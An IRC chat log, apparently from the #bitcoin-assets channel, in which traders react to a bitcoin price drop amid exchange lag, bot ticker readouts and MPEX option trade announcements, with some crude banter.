sold Mar 28 22:16:19 k Mar 28 22:16:25 I wonder what the profit was on those Mar 28 22:16:39 i feel bad for MPOE bot Mar 28 22:16:41 gettin' raped Mar 28 22:16:52 like one of mircea_popescu hoes Mar 28 22:17:13 lol Mar 28 22:17:19 http://polimedia.us/dtng/c/src/136450180885.gif Mar 28 22:17:57 uh oh... Mar 28 22:18:01 ;;goxlag Mar 28 22:18:02 95.704825 seconds Mar 28 22:18:24 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.3056527 = 305.6527 BTC [+] Mar 28 22:18:33 oh nooooooo Mar 28 22:18:52 91 Mar 28 22:19:11 sell now, you'll be able to buy back cheeper Mar 28 22:20:11 ;;ticker Mar 28 22:20:11 BTCUSD ticker | Best bid: 90.32000, Best ask: 90.75000, Bid-ask spread: 0.43000, Last trade: 90.32000, 24 hour volume: 66265.68140184, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.04115 Mar 28 22:20:55 its a trap! Mar 28 22:21:09 90 Mar 28 22:21:27 ;;bc,24hprc Mar 28 22:21:29 91.98 Mar 28 22:21:52 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.3055781 = 305.5781 BTC [-] Mar 28 22:23:01 89.6 Mar 28 22:23:04 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.28411896 = 284.119 BTC [+] Mar 28 22:23:06 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.26265983 = 262.6598 BTC [+] Mar 28 22:23:16 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.21974155 = 219.7416 BTC [+] Mar 28 22:23:17 Dude what is this nonsense? Mar 28 22:23:21 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.24120069 = 241.2007 BTC [+] Mar 28 22:23:23 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.19828242 = 198.2824 BTC [+] Mar 28 22:23:34 panic. Mar 28 22:23:50 good buy level Mar 28 22:24:09 $5 isn't really that much considering it's at 90 Mar 28 22:24:25 this panic may help MPOE bot... Mar 28 22:24:29 looks like a regular opex date to me Mar 28 22:24:33 drop to 85 come on Mar 28 22:24:45 [MPEX] [S.BBET] 300 @ 0.00050015 = 0.15 BTC [-] Mar 28 22:25:03 ;;bc,24hprc Mar 28 22:25:07 91.98 Mar 28 22:25:23 [BTCTC] [ASICMINER-PT] 10 @ 0.74 = 7.4 BTC [+] Mar 28 22:25:29 i was short twice today Mar 28 22:25:32 at 94 :( Mar 28 22:25:37 but closed out @ breakeven Mar 28 22:25:41 and slight loss Mar 28 22:25:53 87.85 Mar 28 22:25:55 if you fish, you gotta stick to it Mar 28 22:25:56 damnit Mar 28 22:26:08 YES YES Mar 28 22:26:15 I LOVE DIPS Mar 28 22:26:26 funny thing is that I shorted on bitfinex and now I can't even get to the fuckin' site! Mar 28 22:26:27 ;;ticker Mar 28 22:26:27 BTCUSD ticker | Best bid: 87.90001, Best ask: 88.00000, Bid-ask spread: 0.09999, Last trade: 88.00000, 24 hour volume: 66265.68140184, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.04115 Mar 28 22:26:35 Sheet Mar 28 22:26:40 it's going down. Mar 28 22:26:52 [BTCTC] [GSDPT] 1 @ 0.00411 BTC [+] Mar 28 22:27:21 [BTCTC] [ASICMINER-PT] 10 @ 0.74 = 7.4 BTC [+] Mar 28 22:27:44 You're still making money Bugpowder Mar 28 22:27:45 :P Mar 28 22:27:56 83-84 was the target price Mar 28 22:28:13 [MPEX] [O.BTCUSD.C590T] 1000 @ 0.3699555 = 369.9555 BTC [+] Mar 28 22:28:27 the thing to remember now is Mar 28 22:28:31 sell when it's this low Mar 28 22:28:37 because it will go to zero Mar 28 22:28:45 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.34849637 = 348.4964 BTC [+] Mar 28 22:28:46 [16:08] my spidey sense tells me that something is about to happen Mar 28 22:28:57 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.32703723 = 327.0372 BTC [-] Mar 28 22:29:15 look at all those tesla coins Mar 28 22:29:21 oh damn Mar 28 22:29:22 85 Mar 28 22:29:23 $vwap oix Mar 28 22:29:23 ! Mar 28 22:29:25 smickles: ^OIX 1 day: no data 7 day: average: 83.57363506 high: 83.58929887 low: 61.9373141 volume: 67796 btc: 11746.6100017 30 day: no data Mar 28 22:30:09 ;;goxlag Mar 28 22:30:10 416.112945 seconds Mar 28 22:30:17 yeesh Mar 28 22:30:20 delicious Mar 28 22:30:21 heavy trading Mar 28 22:30:27 Don't think I've seen it that high yet. Mar 28 22:30:31 i think i know what the lag is and how you can cause it Mar 28 22:30:37 haven't tested it yet Mar 28 22:30:38 and not telling Mar 28 22:30:55 thanks for sharing Mar 28 22:30:59 ;;ticker Mar 28 22:31:03 BTCUSD ticker | Best bid: 84.68400, Best ask: 88.00000, Bid-ask spread: 3.31600, Last trade: 88.00000, 24 hour volume: 66265.68140184, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.04115 Mar 28 22:31:03 holy shit Mar 28 22:31:13 Bugpowder: you get out? Mar 28 22:31:24 working on it... Mar 28 22:31:24 HAH Mar 28 22:31:26 ;;ticker Mar 28 22:31:27 BTCUSD ticker | Best bid: 84.68400, Best ask: 88.00000, Bid-ask spread: 3.31600, Last trade: 88.00000, 24 hour volume: 66265.68140184, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.04115 Mar 28 22:31:46 I think somewhere in the 60's is where it'll bottom out and presumable bounce back... Mar 28 22:32:02 why? Mar 28 22:32:08 why the 60's? Mar 28 22:32:10 idk, bounce before likely, then it might try 60 Mar 28 22:32:27 60 is a bit far imo Mar 28 22:32:39 80, and then worse from there, but not in one huge move Mar 28 22:32:51 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.23792695 = 237.927 BTC [-] Mar 28 22:33:04 and now we play the lag game Mar 28 22:33:06 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.2163756 = 216.3756 BTC [-] Mar 28 22:33:10 :( Mar 28 22:33:17 www.teevault.com/wp-content/uploads/2011/11/Now-Panic-and-Freak-Out-Tshirt.jpg << good find whoever earlier Mar 28 22:33:20 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.19482424 = 194.8242 BTC [-] Mar 28 22:33:32 out Mar 28 22:33:49 60 is far Mar 28 22:33:51 69 is not Mar 28 22:34:17 60 was last support Mar 28 22:34:26 [MPEX] [O.BTCUSD.C630T] 10 @ 0.32413236 = 3.2413 BTC [-] Mar 28 22:34:40 [MPEX] [O.BTCUSD.C750T] 4 @ 0.15280605 = 0.6112 BTC [-] Mar 28 22:34:57 70000 traded in the low 60's before going back up Mar 28 22:35:09 ;;calc 75/(1-.1528) Mar 28 22:35:09 88.5269121813 Mar 28 22:35:18 are you talking eurps or sumth? Mar 28 22:35:29 euros* Mar 28 22:35:56 ;;ticker Mar 28 22:35:58 BTCUSD ticker | Best bid: 87.80000, Best ask: 88.00000, Bid-ask spread: 0.20000, Last trade: 88.00000, 24 hour volume: 66265.68140184, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.04115 Mar 28 22:36:06 ;;goxlag Mar 28 22:36:07 347.343151 seconds Mar 28 22:36:09 why are we going down :< Mar 28 22:36:16 smickles pm Mar 28 22:36:16 why were we going up? Mar 28 22:36:22 hehe Mar 28 22:36:25 this is a temporary setback Mar 28 22:36:41 healthy pull back Mar 28 22:37:05 [MPEX] [O.BTCUSD.C690T] 300 @ 0.2594783 = 77.8435 BTC [-] Mar 28 22:37:07 [MPEX] [O.BTCUSD.C670T] 300 @ 0.28102966 = 84.3089 BTC [-] Mar 28 22:37:09 [MPEX] [O.BTCUSD.C650T] 300 @ 0.30258101 = 90.7743 BTC [-] Mar 28 22:37:33 goddamned bitfinex! Mar 28 22:37:53 are these assbot messages options that are exercised? Mar 28 22:38:12 no, sold to bot Mar 28 22:38:19 does bot pay more? Mar 28 22:38:25 yes Mar 28 22:38:33 nuts Mar 28 22:38:36 about .012 more atm Mar 28 22:38:43 is there no way to cancel an order in coinbr ? Mar 28 22:39:01 dashborad Mar 28 22:39:04 $mpexlag Mar 28 22:39:06 smickles: 0.108469963074 seconds Mar 28 22:39:07 click cancel Mar 28 22:39:08 lol watch this bounce higher than ever Mar 28 22:39:14 bitesak, how does the order look on dashboard? Mar 28 22:39:22 Bugpowder_: possibly Mar 28 22:39:25 smickles: did u just take down your bot? Mar 28 22:39:30 0.1942415 per 75 calls Mar 28 22:39:31 but its time for fridays weekend drop tomorrow Mar 28 22:39:36 I just cashed out =/ Mar 28 22:39:37 Bugpowder_: mine's being delayed by gox Mar 28 22:39:45 open order queued Mar 28 22:40:02 ;;goxlag Mar 28 22:40:03 232.493412 seconds Mar 28 22:40:04 bitfinex back up Mar 28 22:40:57 for all my bitching about gox suggested price freezing, i should note it's frozen at 92.7 atm Mar 28 22:41:15 I don't see any cancel button in dashboard. There is detail and Copy Order... Mar 28 22:41:22 jurov: ^ Mar 28 22:41:31 help this one already Mar 28 22:41:43 yes, but is the order Queued or Waiting or? Mar 28 22:41:49 Queued Mar 28 22:42:03 poor guy who bot $5000 off me this morning @ 97.54 Mar 28 22:42:09 sth broke then.. looking into it... Mar 28 22:42:28 there we go, soebot is back Mar 28 22:42:55 [MPEX] [O.BTCUSD.P750T] 23 @ 0.01006016 = 0.2314 BTC [-] Mar 28 22:43:20 [MPEX] [O.BTCUSD.P730T] 52 @ 0.00903515 = 0.4698 BTC [-] Mar 28 22:43:39 ;;ticker Mar 28 22:43:40 BTCUSD ticker | Best bid: 87.30000, Best ask: 87.90000, Bid-ask spread: 0.60000, Last trade: 87.30000, 24 hour volume: 66265.68140184, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.04115 Mar 28 22:43:54 ;;goxlag Mar 28 22:43:55 349.718471 seconds Mar 28 22:43:59 :P Mar 28 22:44:00 [MPEX] [O.BTCUSD.C750T] 1 @ 0.16930804 BTC [+] Mar 28 22:44:15 [MPEX] [O.BTCUSD.C730T] 1 @ 0.19341941 BTC [-] Mar 28 22:44:30 this put was worth .194 Mar 28 22:44:36 and mpoebot is back Mar 28 22:44:51 ;;calc 73/(1-.134) Mar 28 22:44:51 84.2956120092 Mar 28 22:44:59 [MPEX] [O.BTCUSD.C730T] 4 @ 0.21510589 = 0.8604 BTC [+] Mar 28 22:45:13 [MPEX] [O.BTCUSD.C750T] 1 @ 0.19351975 BTC [+] Mar 28 22:45:43 thanks jurov Mar 28 22:46:41 [MPEX] [O.BTCUSD.C750T] 999 @ 0.19351975 = 193.3262 BTC [+] Mar 28 22:46:43 [MPEX] [O.BTCUSD.C730T] 995 @ 0.21510589 = 214.0304 BTC [+] Mar 28 22:46:47 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.23669203 = 236.692 BTC [-] Mar 28 22:46:49 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.25827817 = 258.2782 BTC [-] Mar 28 22:46:50 hi all Mar 28 22:46:50 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.27986431 = 279.8643 BTC [-] Mar 28 22:46:53 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.30145045 = 301.4505 BTC [-] Mar 28 22:46:57 anychance it can be fixed soon so I can take care of this before heading out? Mar 28 22:47:10 crash? Mar 28 22:47:12 ;;ticker Mar 28 22:47:12 BTCUSD ticker | Best bid: 88.00000, Best ask: 89.00000, Bid-ask spread: 1.00000, Last trade: 88.00000, 24 hour volume: 66265.68140184, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.04115 Mar 28 22:47:16 ;;goxlag Mar 28 22:47:17 50.309144 seconds Mar 28 22:47:31 $vwap oi Mar 28 22:47:32 Deshi Basara Mar 28 22:47:32 smickles: ^OIX 1 day: no data 7 day: average: 84.67319583 high: 84.68490566 low: 66.22384528 volume: 77763 btc: 14138.0440799 30 day: no data Mar 28 22:47:58 ;;bc,24prc Mar 28 22:47:58 Error: "bc,24prc" is not a valid command. Mar 28 22:48:03 :( Mar 28 22:48:16 h Mar 28 22:48:32 ;;bc,24hprc Mar 28 22:48:34 91.43 Mar 28 22:49:29 someone needs to take assbot out for a drink Mar 28 22:50:09 bitesak: fixed Mar 28 22:50:14 yeah Mar 28 22:51:31 so that 700 dump on btce really spooked some people, eh? Mar 28 22:51:41 [MPEX] [O.BTCUSD.C750T] 4 @ 0.15103205 = 0.6041 BTC [-] Mar 28 22:52:25 man Mar 28 22:52:44 what happened to that one asshole that hung around here and annoyed the shit out of me because I wuldnt give him preferencial treatment Mar 28 22:53:00 so sleepy :( Mar 28 22:53:57 oh, noes, i can't fetch mtgox depth Mar 28 22:54:08 ;;goxlag Mar 28 22:54:09 116.093614 seconds Mar 28 22:54:13 fail more gox Mar 28 22:54:41 we dropped to 84 Mar 28 22:54:42 lol Mar 28 22:55:02 [BTCTC] [COGNITIVE] 1 @ 0.1201 BTC [-] Mar 28 22:55:13 back to less than a billion Mar 28 22:55:37 [BTCTC] [COGNITIVE] 2 @ 0.12 = 0.24 BTC [-] Mar 28 22:55:44 no champagne for goat Mar 28 22:55:55 and he had it on ice, ready to go Mar 28 22:56:22 [BTCTC] [COGNITIVE] 7 @ 0.119 = 0.833 BTC [-] Mar 28 22:56:24 [BTCTC] [COGNITIVE] 1 @ 0.118 BTC [-] Mar 28 22:56:26 i got my 1 btc Mar 28 22:56:28 coin Mar 28 22:56:30 looks pretty Mar 28 22:56:45 casacius? Mar 28 22:56:50 yah Mar 28 22:57:15 [MPEX] [O.BTCUSD.C730T] 1 @ 0.2133214 BTC [-] Mar 28 22:57:16 [MPEX] [O.BTCUSD.C750T] 1 @ 0.19168637 BTC [+] Mar 28 22:57:22 these bears are gonna be in a world of hurt Mar 28 22:58:03 yep Mar 28 22:58:29 next leg down Mar 28 22:58:43 [MPEX] [O.BTCUSD.C750T] 999 @ 0.19168637 = 191.4947 BTC [+] Mar 28 22:58:45 [MPEX] [O.BTCUSD.C750T] 1 @ 0.14425872 BTC [-] Mar 28 22:58:47 [MPEX] [O.BTCUSD.C730T] 999 @ 0.2133214 = 213.1081 BTC [-] Mar 28 22:58:51 [MPEX] [O.BTCUSD.C730T] 1 @ 0.16512605 BTC [-] Mar 28 22:58:58 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.23495643 = 234.9564 BTC [-] Mar 28 22:59:01 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.25659146 = 256.5915 BTC [-] Mar 28 22:59:03 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.27822649 = 278.2265 BTC [-] Mar 28 22:59:04 [MPEX] [O.BTCUSD.C650T] 700 @ 0.29986152 = 209.9031 BTC [-] Mar 28 22:59:20 bowjob: https://plus.google.com/u/0/110002005484628672852/posts/418r6Ur4SZd Mar 28 22:59:36 i think the lag might be because all the fund checks mtgox does, like you can put in orders witout having funds Mar 28 22:59:41 mines the one on the left Mar 28 22:59:42 lol Mar 28 22:59:48 when another order gets filled mtgox will fund those other orders insantly Mar 28 22:59:54 smickles: hey Mar 28 22:59:55 putting the exchange on hold first Mar 28 22:59:59 smick Mar 28 23:00:06 GJ on the 10 BTC coin Mar 28 23:00:12 I'd love to get a 2013 on Mar 28 23:00:24 this coin I have will be a perma physical coin Mar 28 23:00:24 crazy volatility Mar 28 23:00:57 What I don't understand is why someone would cash out to fiat Mar 28 23:00:58 lol Mar 28 23:00:59 wtf Mar 28 23:01:01 what the hell Mar 28 23:01:03 ;;ticker Mar 28 23:01:06 BTCUSD ticker | Best bid: 90.00000, Best ask: 90.15000, Bid-ask spread: 0.15000, Last trade: 90.00000, 24 hour volume: 78305.80736563, 24 hour low: 84.68400, 24 hour high: 95.70000, 24 hour vwap: 91.32378 Mar 28 23:01:17 [BTCTC] [COGNITIVE] 43 @ 0.1161 = 4.9923 BTC [-] Mar 28 23:01:19 [BTCTC] [COGNITIVE] 40 @ 0.1115 = 4.46 BTC [-] Mar 28 23:01:50 [BTCTC] [COGNITIVE] 1 @ 0.108 BTC [-] Mar 28 23:02:17 bowjob: btw, that lappy in the background was freshly purchased with btc :D Mar 28 23:02:31 gratz Mar 28 23:02:59 the spoils of war! Mar 28 23:03:03 so no one has seen eskimobob around? Mar 28 23:03:11 not in a little while Mar 28 23:03:14 one more chance to sell Mar 28 23:03:31 meh Mar 28 23:03:33 ;;seen EskimoBob Mar 28 23:03:33 EskimoBob was last seen in #bitcoin-assets 2 weeks, 4 days, 0 hours, 20 minutes, and 3 seconds ago: wow, LOOK! A 11 btc trade at pervert bazaar. Must be a killer week of trading :) Mar 28 23:03:42 lol Mar 28 23:03:45 hahaha Mar 28 23:03:48 lol Mar 28 23:03:52 maybe he ragequit when I started making good on my promise Mar 28 23:04:14 he could be tiber actually Mar 28 23:04:19 ;;bids 80 Mar 28 23:04:19 wasn't he running some glbsesque asset ? Mar 28 23:04:22 There are currently 5726.2787 bitcoins demanded at or over 80.0 USD, worth 474027.313763 USD in total. | Data vintage: 0.0059 seconds Mar 28 23:04:28 mircea_popescu: yeah, but he defaulted iirc Mar 28 23:04:33 ;;asks 95 Mar 28 23:04:34 There are currently 5196.4086 bitcoins offered at or under 95.0 USD, worth 485299.540029 USD in total. | Data vintage: 12.2856 seconds Mar 28 23:04:34 wait what ?! Mar 28 23:04:36 link ? Mar 28 23:04:39 art defaaulted? Mar 28 23:04:49 cant remember the name of the asset Mar 28 23:05:06 [HAVELOCK] [SDICE] 1 @ 0.3788 BTC [-] Mar 28 23:05:07 [HAVELOCK] [SDICE] 7 @ 0.37100001 = 2.597 BTC [-] Mar 28 23:05:09 [HAVELOCK] [SDICE] 29 @ 0.371 = 10.759 BTC [-] Mar 28 23:05:10 [HAVELOCK] [SDICE] 23 @ 0.37 = 8.51 BTC [-] Mar 28 23:05:11 [HAVELOCK] [SDICE] 4 @ 0.37 = 1.48 BTC [-] Mar 28 23:05:13 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.19098576 = 190.9858 BTC [+] Mar 28 23:05:15 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.21263947 = 212.6395 BTC [+] Mar 28 23:05:17 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.23429318 = 234.2932 BTC [-] Mar 28 23:05:19 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.2559469 = 255.9469 BTC [-] Mar 28 23:05:24 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.27760061 = 277.6006 BTC [-] Mar 28 23:06:07 [HAVELOCK] [VTX] 1 @ 0.435 BTC [-] Mar 28 23:06:38 5 min lag Mar 28 23:06:44 3 Mar 28 23:06:55 ;;bids 88 Mar 28 23:06:58 There are currently 1009.4445 bitcoins demanded at or over 88.0 USD, worth 88831.1116898 USD in total. | Data vintage: 0.0064 seconds Mar 28 23:07:05 bid walls are going up... Mar 28 23:07:42 Cheap coins Mar 28 23:10:41 easter weekend... Mar 28 23:10:50 lots of people being at home and having plenty of time to panic Mar 28 23:10:52 :) Mar 28 23:10:55 they'll get cheaper Mar 28 23:10:55 gonna be interesting Mar 28 23:11:39 [MPEX] [O.BTCUSD.C730T] 1 @ 0.19957113 BTC [-] Mar 28 23:11:41 [MPEX] [O.BTCUSD.C750T] 1 @ 0.17589554 BTC [-] Mar 28 23:11:54 somone bought the .17 option? Mar 28 23:13:29 [MPEX] [O.BTCUSD.C750T] 999 @ 0.1904595 = 190.269 BTC [+] Mar 28 23:13:36 [MPEX] [O.BTCUSD.C750T] 1 @ 0.14 BTC [-] Mar 28 23:13:38 [MPEX] [O.BTCUSD.C730T] 999 @ 0.21212725 = 211.9151 BTC [+] Mar 28 23:13:39 [MPEX] [O.BTCUSD.C730T] 1 @ 0.1 BTC [-] Mar 28 23:13:45 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.23379499 = 233.795 BTC [-] Mar 28 23:13:49 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.25546274 = 255.4627 BTC [-] Mar 28 23:13:52 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.27713049 = 277.1305 BTC [-] Mar 28 23:14:20 a lot of for sale at 87 Mar 28 23:14:48 https://bitcointalk.org/index.php?topic=160292 Mar 28 23:14:50 ;;title Mar 28 23:14:50 (title ) -- Returns the HTML ... of a URL. Mar 28 23:14:59 bah Mar 28 23:15:12 cyprus taking monies Mar 28 23:15:16 so, when popescu are planning to sell his coins? I will not believe that he will pass this fun:-) Mar 28 23:15:53 look out below Mar 28 23:16:09 sell for what ? Mar 28 23:16:23 Cylta: mp has said befor that he doesn't intend to sell Mar 28 23:16:38 hmm.. for chinese or japanese money. Mar 28 23:16:57 smicles, oh, thanks. I did not see it. Mar 28 23:17:23 new low Mar 28 23:17:43 however, for me its strange to loose such oportunity... Mar 28 23:17:50 what opportunity is that ? Mar 28 23:18:44 to play with big fluctuation, that may happen soon. Mar 28 23:18:57 ;;eauth Mar 28 23:18:57 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Mar 28 23:19:05 ;;eauth thestringpuller Mar 28 23:19:05 Request successful for user thestringpuller, hostmask thestringpuller!~leflor@99-39-97-12.lightspeed.tukrga.sbcglobal.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/0FF2943DA179E169 Mar 28 23:19:45 ;;everify freenode:#bitcoin-otc:e00de96eba2eeab5e6a9455a939de58ac170fb9de7b1e0d9b356eda6 Mar 28 23:19:46 You are now authenticated for user thestringpuller with key 0FF2943DA179E169 Mar 28 23:19:48 ;;ident Mar 28 23:19:48 You are identified as user thestringpuller, with GPG key id 0FF2943DA179E169, key fingerprint 6ACE36E786F39A4ADC4506DE0FF2943DA179E169, and bitcoin address None Mar 28 23:19:58 nevermind, too late, its happening right now :-) Mar 28 23:20:22 [MPEX] [O.BTCUSD.C750T] 1 @ 0.15683346 BTC [+] Mar 28 23:21:32 i'm probably the largest player anyway, indirectly, via mpoe bot. Mar 28 23:22:05 and now comes the panic selling Mar 28 23:22:34 maybe a good time to buy puts... Mar 28 23:22:57 cheap coins ^^^ Mar 28 23:23:14 no, not a good time. Expire next day Mar 28 23:23:21 PUTs too expensive Mar 28 23:23:30 Better wait till after Friday Mar 28 23:23:38 ;;ticker Mar 28 23:23:40 BTCUSD ticker | Best bid: 82.50000, Best ask: 83.00000, Bid-ask spread: 0.50000, Last trade: 83.00000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:23:43 ;;goxlag Mar 28 23:23:44 153.416772 seconds Mar 28 23:23:55 such a patience test for me ear every month's end Mar 28 23:24:13 sitting on heap of MPBPT funds and avoid doing anything stupid with them Mar 28 23:24:31 :) Mar 28 23:24:41 lol Mar 28 23:24:45 as whole worls around writhes in panic Mar 28 23:25:24 let me take a peak at otc Mar 28 23:25:26 but the btcquick ipo sharpshooting paid handsomely :p Mar 28 23:25:59 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.18746445 = 187.4645 BTC [+] Mar 28 23:26:01 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.20921206 = 209.2121 BTC [+] Mar 28 23:26:02 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.23095968 = 230.9597 BTC [-] Mar 28 23:26:05 [MPEX] [O.BTCUSD.C690T] 695 @ 0.25270729 = 175.6316 BTC [-] Mar 28 23:26:07 [MPEX] [O.BTCUSD.C670T] 700 @ 0.27445491 = 192.1184 BTC [-] Mar 28 23:26:29 ;;ticker Mar 28 23:26:29 BTCUSD ticker | Best bid: 81.00000, Best ask: 82.95000, Bid-ask spread: 1.95000, Last trade: 82.00000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:26:37 2$ spread Mar 28 23:27:53 mp are you able in technical meaning to start rally or panic sell? Mar 28 23:28:55 Namworld: you could buy the N puts Mar 28 23:29:06 they will be the T puts soon Mar 28 23:29:06 [HAVELOCK] [SDICE] 1 @ 0.40999999 BTC [+] Mar 28 23:29:07 [HAVELOCK] [SDICE] 3 @ 0.41 = 1.23 BTC [+] Mar 28 23:29:14 ;;vwap ^oix Mar 28 23:29:15 Error: "vwap" is not a valid command. Mar 28 23:29:20 !vwap ^oix Mar 28 23:29:28 or, wait. how will the name conversion affect that? Mar 28 23:29:31 $ Mar 28 23:29:37 $vwap oi Mar 28 23:29:39 smickles: ^OIX 1 day: no data 7 day: average: 86.19880169 high: 86.20830418 low: 66.22384528 volume: 97867 btc: 18859.8396038 30 day: no data Mar 28 23:29:50 smickles: too expensive Mar 28 23:29:50 for example by big sell on mtgox, or serie of small sells, or by changing ratio of amount of options on mpex... Mar 28 23:30:35 or by postponing to list calls struck above 75, you mean? Mar 28 23:30:39 lol Mar 28 23:31:34 [BTCTC] [PAJKA.BOND] 1 @ 0.1076 BTC [+] Mar 28 23:31:43 I feel the knife, it hurts Mar 28 23:31:50 [MPEX] [S.MPOE] 2950 @ 0.00066576 = 1.964 BTC [+] Mar 28 23:32:13 it's recovering Mar 28 23:32:14 btw, i could really use a cheatsheet for the bots on -assets website Mar 28 23:32:16 ;;goxlag Mar 28 23:32:16 480.88988 seconds Mar 28 23:32:53 ;;ticker Mar 28 23:32:53 BTCUSD ticker | Best bid: 80.00000, Best ask: 82.00000, Bid-ask spread: 2.00000, Last trade: 80.00000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:33:00 [BTCTC] [ASICMINER-PT] 1 @ 0.739 BTC [-] Mar 28 23:33:14 you jinxed it Mar 28 23:33:15 bitcoinity showing 29 Mar 28 23:33:18 er Mar 28 23:33:20 79 Mar 28 23:33:21 I JINXED IT! Mar 28 23:33:26 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [+] Mar 28 23:33:27 82 now Mar 28 23:33:30 its wild Mar 28 23:33:47 bounce at 65 Mar 28 23:33:50 fuck this... we're going to 1 USD/BTC! Mar 28 23:34:18 lol...only if satoshi's selling Mar 28 23:34:30 or hal Mar 28 23:34:38 upon seeing devteam's recent endeavors Mar 28 23:34:56 lol Mar 28 23:35:34 this is going to be one heluva beer run Mar 28 23:35:49 [MPEX] [O.BTCUSD.C750T] 1 @ 0.13883755 BTC [-] Mar 28 23:36:25 [BTCTC] [ASICMINER-PT] 67 @ 0.74 = 49.58 BTC [+] Mar 28 23:36:32 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [+] Mar 28 23:36:44 [MPEX] [O.BTCUSD.C750T] 999 @ 0.18391246 = 183.7285 BTC [+] Mar 28 23:36:46 [MPEX] [O.BTCUSD.C750T] 1 @ 0.12032302 BTC [-] Mar 28 23:36:48 [MPEX] [O.BTCUSD.C730T] 979 @ 0.2057548 = 201.4339 BTC [-] Mar 28 23:36:49 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.22759713 = 227.5971 BTC [-] Mar 28 23:37:03 ;;bc,24hprc Mar 28 23:37:08 90.34 Mar 28 23:37:22 ;;calc 71/(1-.22) Mar 28 23:37:22 91.0256410256 Mar 28 23:37:29 mircea_popescu: what happenes if MPOEBOT writes a contract Mar 28 23:37:31 dude someone is buying massive amounts of AM shares on BitFunder Mar 28 23:37:33 then buys that same contract back Mar 28 23:37:35 [BTCTC] [ASICMINER-PT] 4 @ 0.749 = 2.996 BTC [+] Mar 28 23:37:42 thestringpuller nothing Mar 28 23:37:56 [BTCTC] [ASICMINER-PT] 2 @ 0.749 = 1.498 BTC [+] Mar 28 23:38:29 [BTCTC] [ASICMINER-PT] 8 @ 0.749 = 5.992 BTC [+] Mar 28 23:39:03 ;;ticker Mar 28 23:39:04 BTCUSD ticker | Best bid: 78.51110, Best ask: 79.00000, Bid-ask spread: 0.48890, Last trade: 79.00000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:40:30 [MPEX] [O.BTCUSD.C310T] 2 @ 0.66444382 = 1.3289 BTC [+] Mar 28 23:42:29 lol good i bought my calls like month ago Mar 28 23:42:38 C310s not affected. Mar 28 23:43:40 ;;ticker Mar 28 23:43:41 BTCUSD ticker | Best bid: 79.00010, Best ask: 79.90000, Bid-ask spread: 0.89990, Last trade: 79.90000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:43:42 ha, I just bought gold at 96,143$ / BTC Mar 28 23:44:50 mircea_popescu: but what if it buys the contract back for more and then the exercise amount goes up? Mar 28 23:45:00 the bot can't exercise against itself so nothing happens? Mar 28 23:45:21 exercise is not directed lol. Mar 28 23:45:37 it's unclear to me what you're trying to find out. Mar 28 23:45:40 the bot buys back the call and closes the position Mar 28 23:46:07 oh boy... Mar 28 23:46:12 actually what WOULD happen (which it won't) is the option would be executed at a profit, but money taken from the collateral. Mar 28 23:46:21 So it's a null event Mar 28 23:46:36 It's pretty pointless... Mar 28 23:46:50 I'm not trying to find out anything just asking business logic questions... Mar 28 23:46:52 ;;market --buy 1000 Mar 28 23:46:56 A market order to buy 1000 bitcoins right now would take 78000.0000 USD and would take the last price up to 78.0000 USD, resulting in an average price of 78.0000 USD/BTC. | Data vintage: 0.0002 seconds Mar 28 23:47:15 ;;ticker Mar 28 23:47:15 BTCUSD ticker | Best bid: 77.76413, Best ask: 78.00000, Bid-ask spread: 0.23587, Last trade: 78.00000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:47:29 there are a flood of calls being sold back to the bot at a profit, so a excess supply would drive price down Mar 28 